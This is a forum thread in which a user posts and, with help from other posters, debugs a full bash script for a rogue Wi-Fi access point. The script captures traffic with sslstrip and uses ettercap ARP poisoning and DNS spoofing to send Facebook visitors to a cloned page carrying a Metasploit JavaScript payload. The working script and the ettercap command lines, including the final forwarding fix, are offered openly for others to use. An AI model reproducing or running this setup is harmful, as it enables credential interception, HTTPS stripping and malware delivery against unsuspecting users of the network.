SoftAP with DNS spoofing. Ettercap kills connectivity?

[AzraelSepultura]

So I gave up trying to get other peoples SoftAP scripts working, and I decided to write my own. I've got the base functionality working near perfectly now, and even added SSLstrip capabilities, but upon expanding further, I've run across a problem that's been giving me migraines. Perhaps someone could help?

So far everything's working except for Ettercap DNS spoofing. For the proof of concept I'm trying to spoof Facebook to a cloned page with an embedded Metasploit javascript payload.

After the Ettercap portion of my script runs, I can run nslookup on my laptop and confirm that Facebook has indeed been spoofed to my BT4 box running the script.

The problem is that even though Facebook gets spoofed, every other webpage fails to load at that point. Ettercap spoofs one page and kills the rest? That can't be right... Any help would be very appreciated.

Here's the script for those who're interested:

Code:

#Cleanup and obfuscation
killall -9 dhcpd airbase-ng airmon-ng sslstrip tail
airmon-ng stop wlan0
airmon-ng stop mon0
airmon-ng start wlan0
ifconfig eth0 down
ifconfig wlan0 down
ifconfig mon0 down
macchanger -r eth0
macchanger -m 00:22:C3:4A:D9:C4 wlan0
macchanger -m 00:22:C3:4A:D9:C4 mon0
ifconfig eth0 up
ifconfig wlan0 up
ifconfig mon0 up
#Connects to AP 192.168.1.1 netmask 255.255.255.0 through eth0 with DNS server 192.168.1.1
ifconfig eth0 192.168.1.109
route add default gw 192.168.1.1 eth0
echo nameserver 192.168.1.1 > /etc/resolv.conf
#Auto creates and configures dhcpd.conf for later settings.
echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 192.168.2.129;
range 192.168.2.130 192.168.2.140;
}" > dhcpd.conf
#Enable tunneling for later routing
modprobe tun &
#Start the access point with BSSID 00:1A:B2:3D:C4:5D and ESSID SoftAP on channel 1 via mon0
xterm -e airbase-ng -e "SoftAP" -c 6 -v mon0 &
sleep 8
#To respond to !ALL! essid probes use: "xterm -e airbase-ng -P -C 15 -e "(ESSID)" -c 1 -v mon0 &" !!ILLEGAL!!
#Brings up the tap interface created by airbase-ng and assigns it an IP, netmask, and route
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
#Gives dhcpd the permissions it needs
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
#Runs DHCP server for SoftAP
xterm -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
sleep 5
#Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables rules
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT #delete if necessary / redundant later
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT #?
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
#Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules!
iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o at0 -p tcp -m multiport --dports 80,443 --sport 1024:65535
iptables -A INPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -i at0 -p tcp
#End of contribution
#Enables http and https traffic to be redirected to sslstrip on port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
#Launches sslstrip, listening on port 8080 for redirected packets
xterm -e /usr/bin/./sslstrip -l 8080 -w /root/sslstrip.log &
sleep 5
#Launches a new terminal that will interactively display the contents of sslstrip.log as it grows
xterm -e tail -f /root/sslstrip.log &
#Buggy ettercap page redirect
echo
echo "Run SET, and make a cloned webpage of facebook with a javascript payload"
echo
echo "facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
echo "*.facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
echo "www.facebook.com PTR 192.168.2.129" >> /usr/share/ettercap/etter.dns
read -p "Press any key after a client connects to continue."
echo "Running ettercap to redirect facebook to 192.168.2.129"
xterm -e ettercap -i at0 -T -q -P dns_spoof -M arp /192.168.2.129/ /192.168.2.130/ &
sleep 5
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
EOF

[sickness]

This is why it's best to do these things manually so you can troubleshoot if something goes wrong.

Try doing a dns_spoof with ettercap and see if it works than you can compare it to what the script does and see what the problem is.

[LHYX1]

Did you modify the etter.conf file ?
And can't it be that it's somekind of a forwarding problem ? I understand that the only webpage that works is the one you are dns spoofing. Try spoofing every webpage and see what happens. I have also been playing with these scripts and I couldn't see any webpage untill I started dns spoofing. I saw the webpages but they didn't get redirected to my webpage.
(my dhcp.conf file and my portforwarding setup were basicly the same as yours)

[AzraelSepultura]

I have previously used Ettercap to successfully spoof Facebook on the same laptop that is wirelessly connected to the real AP with eth0 as my "attack box" interface with:

Code:

ettercap -i eth0 -T -q -P dns_spoof -M arp /Router IP/ /Laptop IP/

The real difficulty comes from translating this to my SoftAP interface at0. Including the -M arp switch/argument ends up not spoofing Facebook, and killing all other connectivity, while

Code:

ettercap -i at0 -T -q -P dns_spoof /192.168.2.129/ /192.168.2.130/

Does spoof Facebook, but kills all other connectivity. It may be a forwarding issue though... I may be wrong, but I thought that configuring IP tables manually would make editing the etter.conf file unnecessary.

[killadaninja]

Plenty of mistakes.

Why do you not just change the ettercap adapater in SET`s config and set up a fake AP afterwards?

#Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules

Well I wouldnt if I were you.

Your script says tcp, one two many times. Could look SO MUCH simpler

And can't it be that it's somekind of a forwarding problem ?

The answer to that question is in it`s following statement.

I understand that the only webpage that works is the one you are dns spoofing

6.32 AM right now, and even robots need sleep so ill help you out tomorrow.

[AzraelSepultura]

Thanks a million Killa As you can no doubt tell by my clumsy scripting, I am -very- new to this. I'm surprised I've got it working as well as it is. Not entirely sure on how to automate SET into it yet. I'll figure it out eventually, but clearly I've got some bugs to iron out before I proceed to make things more complicated/elegant.

Also @ LHYX1, I ran my fully working base SoftAP script (No attack addons) and set up ettercap to spoof ALL DNS queries to my SoftAP's IP hosting the cloned Facebook, and as I thought, it worked like a charm using:

Code:

ettercap -i at0 -T -q -P dns_spoof -M arp:oneway /192.168.2.130/

Unfortunately I'm still at square one. Spoofing works, but it kills connectivity in the process. I've played around with the different arguments for -M arp, and tried targeting different IPs with alot of connections breaking, and no luck.

The biggest brain-bender for me is this: Using ettercap, you need to arp poison the targets to place yourself "in the middle" for the dns spoofing to work. Understood. My SoftAP interface at0 is already in the middle of the laptop and the real AP that acts as the gateway and DNS server... I can't arp poison across subnets, or arp poison myself. But there's got to be a way to do this, otherwise things like Killa's script and FakeAP_pwn wouldn't exist.

[AzraelSepultura]

Phew. After spending most of the day troubleshooting and manually launching attacks on my real AP, and then on my softAP I finally figured out the discrepancy.

A before and after

Code:

cat /proc/sys/net/ipv4/ip_forward

revealed that Ettercap was disabling IP forwarding for me. (How nice of it).

The reason for it is even in the man page, which I did search through, but in my haste overlooked it.

I guess the only thing to do now is to re-enable it at the end of the script which you are all free and welcome to use provided you append that little "fix" at the end. At last I am free to expand it and make it interactive so to provide for different interface names and whatnot.

Thanks, everyone for the suggestions!

tl:dr RTFM.